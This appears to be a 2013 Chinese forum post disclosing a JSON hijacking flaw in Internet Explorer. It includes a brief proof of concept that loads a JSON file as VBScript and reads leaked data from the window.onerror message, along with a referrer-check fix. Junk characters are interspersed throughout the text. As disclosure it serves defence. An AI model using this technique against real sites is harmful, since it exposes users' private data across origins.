简要描述:' ^& ?! k8 i+ ~
+ [+ E$ x0 b5 h5 @- I6 W
由于某些资源容器对数据处理不当导致json劫持漏洞.
) o2 n3 R: a/ }) P详细说明:+ i/ t8 l8 R+ i
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
U3 m: f! |- E2 ?<script language=vbscript></script>
5 p W! W7 V Z, r' D/ e 2 @! T6 I" j% z5 Z) l. w
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.' B# e" [% G6 q3 g2 k/ @! x
漏洞证明:
- y" _, x3 W: J7 l+ i: Z<script>( |( H9 S. g e) d
window.onerror=function(_){
! }$ V2 ^8 @8 z2 Y% u& C+ jalert(_)7 g& Q) |, N$ Z! V7 y4 ]1 E
}
2 |3 P0 K# O6 ?" o1 z</script>
* Z6 n( y& U2 Q* W1 l<script language=vbscript src=1.json></script>
6 R9 W% E2 u1 W( N5 \ 2 O! {+ R% C! L6 [
3 |; m) m. _& |, T2 l) o
1.json:) Y2 I7 L) I: ~' l+ ^! `1 a' y
[{"name":"sogili","age":19}]* R( D1 d) v: T3 c' T
修复方案: X0 C7 `5 _1 I$ m. x
网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对